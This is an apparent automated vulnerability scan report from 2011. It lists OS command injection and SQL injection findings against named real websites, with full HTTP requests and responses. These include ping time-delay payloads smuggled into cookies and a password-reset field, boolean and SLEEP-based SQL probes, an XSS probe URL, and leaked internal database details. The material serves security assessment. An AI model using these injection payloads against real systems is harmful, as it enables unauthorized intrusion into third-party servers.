32.137. http://www.nbcconnecticut.com/fonts/nobel_bold.ttf

32.138. http://www.nextadvisor.com/includes/javascript.php

32.139. http://www.socialfollow.com/button/image/

32.140. http://www.socialfollow.com/js/flash-detect.js

32.141. http://www.socialfollow.com/js/jquery.js

32.142. http://www.socialfollow.com/js/thickbox.js

32.143. http://www.socialfollow.com/js/validator.js

32.144. http://www.tagged.com/api/

32.145. http://www.tagged.com/favicon.ico

32.146. http://www2.sesamestats.com/paneltracking.aspx

33. Content type is not specified

33.1. http://ad.yieldmanager.com/st

33.2. http://www.expedia.com/static/default/default/images/close.gif

33.3. http://www.expedia.com/static/frog/v0.1a/images/iconSpritesT.png

33.4. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

33.5. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

33.6. http://www.expedia.com/static/fusion/v2.3/images/customersupport/flyout_arrow.png

33.7. http://www.expedia.com/static/fusion/v2.3/images/customersupport/lady78x78.gif

33.8. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

33.9. http://www.expedia.com/static/fusion/v2.3/images/wizard/promo_bg.png

33.10. http://www.expedia.com/static/fusion/v2.3/images/wizard/wizard_out_bg.gif

33.11. http://www.socialfollow.com/button/image/

33.12. http://www.socialfollow.com/button/image/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

34. SSL certificate

34.1. https://broker.gotoassist.com/

34.2. https://mosaicsecurity.com/

34.3. https://secure.trust-guard.com/

34.4. https://subscribe.haymarketmedia.com/

34.5. https://verify.authorize.net/

34.6. https://www.expedia.com/

34.7. https://www.gofileroom.com/

34.8. https://www.taxnotebook.com/



1. OS command injection  next
There are 6 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. https://secure.trust-guard.com/ [__utmb cookie]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmb cookie. The application took 50222 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384|ping%20-n%2020%20127.0.0.1||x

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:03:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.2. https://secure.trust-guard.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmc cookie. The application took 25682 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874|ping%20-n%2020%20127.0.0.1||x; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the txtEmail parameter. The application took 50190 milliseconds to respond to the request, compared with 25263 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

POST /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
Origin: https://secure.trust-guard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4
Content-Length: 66

txtEmail=-111%27+OR+SLEEP%2825%29%3D0+LIMIT+1--++|ping%20-n%2020%20127.0.0.1||x&btnSubmit=Submit

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:20:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200
Location: index.php
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.4. https://secure.trust-guard.com/index.php [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utma cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utma cookie. The application took 50194 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3`ping%20-c%2020%20127.0.0.1`; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:30:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.5. https://secure.trust-guard.com/index.php [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmz cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmz cookie. The application took 25161 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|ping%20-n%2020%20127.0.0.1||x; PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:12:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The BIGipServerH1-HUNTON-A0910-80 cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the BIGipServerH1-HUNTON-A0910-80 cookie. The application took 47061 milliseconds to respond to the request, compared with 8762 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000|ping%20-c%2020%20127.0.0.1||x; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:17:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2. SQL injection  previous  next
There are 65 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://ads.allatsea.net/www/delivery/spc.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.allatsea.net
Path:   /www/delivery/spc.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=55470886&block=1&charset=UTF-8&loc=http%3A//allatsea.net/by-category/Sailing_Reg/1%20and%201%3d1--%20atta HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419; OAID=a9e7a0f4da4672bb2cdfb39a4d109071

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:33:21 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:33:21 GMT; path=/
Content-Size: 6150
Content-Length: 6150
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=5__zoneid=5__cb=f67466d6e0__oadest=http%3A%2F%2Fwww.igymarinas.com\' target=\'_blank\'><"+"img src=\'http://ads.allatsea.net/www/images/e476945fd8f647e4fa8dc98870332858.gif\' width=\'125\' height=\'125\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_f67466d6e0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=5&amp;campaignid=4&amp;zoneid=5&amp;loc=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Reg%2F1+and+1%3D1--+atta&amp;cb=f67466d6e0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['zone_22_2'] = '';
OA_output['zone_22_2'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['zone_22_2'] += "/* openads=http://ads.allatsea.net/www/delivery bannerid=10 zoneid=5 source= */\n";
OA_output['zone_22_2'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['zone_22_2'] += "google_ad_client = \"ca-pub-9585000347357330\";\n";
OA_output['zone_22_2'] += "/* 125x125, created 3/14/10 */\n";
OA_output['zone_22_2'] += "google_ad_slot = \"8399079020\";\n";
OA_output['zone_22_2'] += "google_ad_width = 125;\n";
OA_output['zone_22_2'] += "google_ad_height = 125;\n";
OA_output['zone_22_2'] += "//-->\n";
OA_output['zone_22_2'] += "<"+"/script>\n";
OA_output['zone_22_2'] += "<"+"script type=\"text/javascript\"\n";
OA_output['zone_22_2'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['zone_22_2'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea.net/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_f641e7f716\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=10&amp;campaignid=3&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fallatse
...[SNIP]...

Request 2

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=55470886&block=1&charset=UTF-8&loc=http%3A//allatsea.net/by-category/Sailing_Reg/1%20and%201%3d2--%20atta HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419; OAID=a9e7a0f4da4672bb2cdfb39a4d109071

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:33:22 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:33:22 GMT; path=/
Content-Size: 6788
Content-Length: 6788
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['zone_22_1'] += "/* openads=http://ads.allatsea.net/www/delivery bannerid=10 zoneid=5 source= */\n";
OA_output['zone_22_1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['zone_22_1'] += "google_ad_client = \"ca-pub-9585000347357330\";\n";
OA_output['zone_22_1'] += "/* 125x125, created 3/14/10 */\n";
OA_output['zone_22_1'] += "google_ad_slot = \"8399079020\";\n";
OA_output['zone_22_1'] += "google_ad_width = 125;\n";
OA_output['zone_22_1'] += "google_ad_height = 125;\n";
OA_output['zone_22_1'] += "//-->\n";
OA_output['zone_22_1'] += "<"+"/script>\n";
OA_output['zone_22_1'] += "<"+"script type=\"text/javascript\"\n";
OA_output['zone_22_1'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['zone_22_1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea.net/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_4f7d84567b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=10&amp;campaignid=3&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Reg%2F1+and+1%3D2--+atta&amp;cb=4f7d84567b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['zone_22_2'] = '';
OA_output['zone_22_2'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=5__zoneid=5__cb=4dd54d6c2a__oadest=http%3A%2F%2Fwww.igymarinas.com\' target=\'_blank\'><"+"img src=\'http://ads.allatsea.net/www/images/e476945fd8f647e4fa8dc98870332858.gif\' width=\'125\' height=\'125\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_4dd54d6c2a\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=5&amp;campaignid=4&amp;zoneid=5&amp;loc=http%3A%2F%2Fallatse
...[SNIP]...

2.2. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ac parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /appshandler.php?ac=1'&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

2.3. http://dce.sapha.com/engine.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ac parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /engine.php?ac=1' HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/company/about-sapha
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
